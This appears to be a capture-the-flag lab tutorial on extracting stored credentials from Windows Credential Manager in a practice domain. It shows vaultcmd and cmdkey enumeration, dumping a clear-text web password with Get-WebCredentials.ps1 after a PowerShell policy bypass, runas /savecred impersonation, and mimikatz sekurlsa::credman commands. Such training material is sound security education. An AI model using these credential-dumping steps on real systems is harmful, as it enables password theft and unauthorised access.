132 lines
6.6 KiB
Markdown
132 lines
6.6 KiB
Markdown
|
|
|||
|
|
## What is Credentials Manager?
|
|||
|
|
|
|||
|
|
Credential Manager is a Windows feature that stores logon-sensitive information for websites, applications, and networks. It contains login credentials such as usernames, passwords, and internet addresses. There are four credential categories:
|
|||
|
|
|
|||
|
|
- Web credentials contain authentication details stored in Internet browsers or other applications.
|
|||
|
|
- Windows credentials contain Windows authentication details, such as NTLM or Kerberos.
|
|||
|
|
- Generic credentials contain basic authentication details, such as clear-text usernames and passwords.
|
|||
|
|
- Certificate-based credentials: Athunticated details based on certifications.
|
|||
|
|
|
|||
|
|
Note that authentication details are stored on the user's folder and are not shared among Windows user accounts. However, they are cached in memory.
|
|||
|
|
|
|||
|
|
Accessing Credential Manager
|
|||
|
|
|
|||
|
|
We can access the Windows Credential Manager through GUI (Control Panel -> User Accounts -> Credential Manager) or the command prompt. In this task, the focus will be more on the command prompt scenario where the GUI is not available.
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
We will be using the Microsoft Credentials Manager `vaultcmd` utility. Let's start to enumerate if there are any stored credentials. First, we list the current windows vaults available in the Windows target.
|
|||
|
|
|
|||
|
|
Listing the Available Credentials from the Credentials Manager
|
|||
|
|
|
|||
|
|
```markup
|
|||
|
|
C:\Users\Administrator>vaultcmd /list
|
|||
|
|
Currently loaded vaults:
|
|||
|
|
Vault: Web Credentials
|
|||
|
|
Vault Guid:4BF4C442-9B8A-41A0-B380-DD4A704DDB28
|
|||
|
|
Location: C:\Users\Administrator\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
|
|||
|
|
|
|||
|
|
Vault: Windows Credentials
|
|||
|
|
Vault Guid:77BC582B-F0A6-4E15-4E80-61736B6F3B29
|
|||
|
|
Location: C:\Users\Administrator\AppData\Local\Microsoft\Vault
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
By default, Windows has two vaults, one for Web and the other one for Windows machine credentials. The above output confirms that we have the two default vaults.
|
|||
|
|
|
|||
|
|
Let's check if there are any stored credentials in the Web Credentials vault by running the vaultcmd command with `/listproperties`.
|
|||
|
|
|
|||
|
|
Checking if there Are any Stored Credentials in the "Web Credentials."
|
|||
|
|
|
|||
|
|
```markup
|
|||
|
|
C:\Users\Administrator>VaultCmd /listproperties:"Web Credentials"
|
|||
|
|
Vault Properties: Web Credentials
|
|||
|
|
Location: C:\Users\Administrator\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
|
|||
|
|
Number of credentials: 1
|
|||
|
|
Current protection method: DPAPI
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
The output shows that we have one stored credential in the specified vault. Now let's try to list more information about the stored credential as follows,
|
|||
|
|
|
|||
|
|
Listing Credentials Details for "Web Credentials"
|
|||
|
|
|
|||
|
|
```markup
|
|||
|
|
C:\Users\Administrator>VaultCmd /listcreds:"Web Credentials"
|
|||
|
|
Credentials in vault: Web Credentials
|
|||
|
|
|
|||
|
|
Credential schema: Windows Web Password Credential
|
|||
|
|
Resource: internal-app.thm.red
|
|||
|
|
Identity: THMUser Saved By: MSEdge
|
|||
|
|
Hidden: No
|
|||
|
|
Roaming: Yes
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## Credential Dumping
|
|||
|
|
The VaultCmd is not able to show the password, but we can rely on other PowerShell Scripts such as [Get-WebCredentials.ps1](https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1), which is already included in the attached VM.
|
|||
|
|
|
|||
|
|
Ensure to execute PowerShell with bypass policy to import it as a module as follows,
|
|||
|
|
|
|||
|
|
Getting Clean-text Password from Web Credentials
|
|||
|
|
|
|||
|
|
```markup
|
|||
|
|
C:\Users\Administrator>powershell -ex bypass
|
|||
|
|
Windows PowerShell
|
|||
|
|
Copyright (C) Microsoft Corporation. All rights reserved.
|
|||
|
|
|
|||
|
|
PS C:\Users\Administrator> Import-Module C:\Tools\Get-WebCredentials.ps1
|
|||
|
|
PS C:\Users\Administrator> Get-WebCredentials
|
|||
|
|
|
|||
|
|
UserName Resource Password Properties
|
|||
|
|
THMUser internal-app.thm.red Password! {[hidden, False], [applicationid, 00000000-0000-0000-0000-000000000000], [application, MSEdge]}
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
The output shows that we obtained the username and password for accessing the internal application.
|
|||
|
|
|
|||
|
|
## RunAs
|
|||
|
|
An alternative method of taking advantage of stored credentials is by using RunAs. RunAs is a command-line built-in tool that allows running Windows applications or tools under different users' permissions. The RunAs tool has various command arguments that could be used in the Windows system. The `/savecred` argument allows you to save the credentials of the user in Windows Credentials Manager (under the Windows Credentials section). So, the next time we execute as the same user, runas will not ask for a password.
|
|||
|
|
|
|||
|
|
Let's apply it to the attached Windows machine. Another way to enumerate stored credentials is by using `cmdkey`, which is a tool to create, delete, and display stored Windows credentials. By providing the `/list` argument, we can show all stored credentials, or we can specify the credential to display more details `/list:computername`.
|
|||
|
|
|
|||
|
|
Enumerating for Stored Windows Credentials
|
|||
|
|
|
|||
|
|
```markup
|
|||
|
|
C:\Users\thm>cmdkey /list
|
|||
|
|
|
|||
|
|
Currently stored credentials:
|
|||
|
|
|
|||
|
|
Target: Domain:interactive=thm\thm-local
|
|||
|
|
Type: Domain Password
|
|||
|
|
User: thm\thm-local
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
The output shows that we have a domain password stored as the `thm\thm-local` user. Note that stored credentials could be for other servers too. Now let's use runas to execute Windows applications as the `thm-local` user.
|
|||
|
|
|
|||
|
|
Run CMD.exe As a User with the /savecred argument
|
|||
|
|
|
|||
|
|
```markup
|
|||
|
|
C:\Users\thm>runas /savecred /user:THM.red\thm-local cmd.exe
|
|||
|
|
Attempting to start cmd.exe as user "THM.red\thm-local" ...
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
A new cmd.exe pops up with a command prompt ready to use. Now run the whoami command to confirm that we are running under the desired user. There is a flag in the `c:\Users\thm-local\Saved Games\flag.txt`, try to read it and answer the question below.
|
|||
|
|
|
|||
|
|
## Mimikatz
|
|||
|
|
Mimikatz is a tool that can dump clear-text passwords stored in the Credential Manager from memory. The steps are similar to those shown in the previous section (Memory dump), but we can specify to show the credentials manager section only this time.
|
|||
|
|
|
|||
|
|
Dumping Memory for Credentials Manager
|
|||
|
|
|
|||
|
|
```markup
|
|||
|
|
C:\Users\Administrator>c:\Tools\Mimikatz\mimikatz.exe
|
|||
|
|
|
|||
|
|
.#####. mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
|
|||
|
|
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
|
|||
|
|
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
|
|||
|
|
## \ / ## > http://blog.gentilkiwi.com/mimikatz
|
|||
|
|
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
|
|||
|
|
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
|
|||
|
|
|
|||
|
|
mimikatz # privilege::debug
|
|||
|
|
Privilege '20' OK
|
|||
|
|
|
|||
|
|
mimikatz # sekurlsa::credman
|
|||
|
|
```
|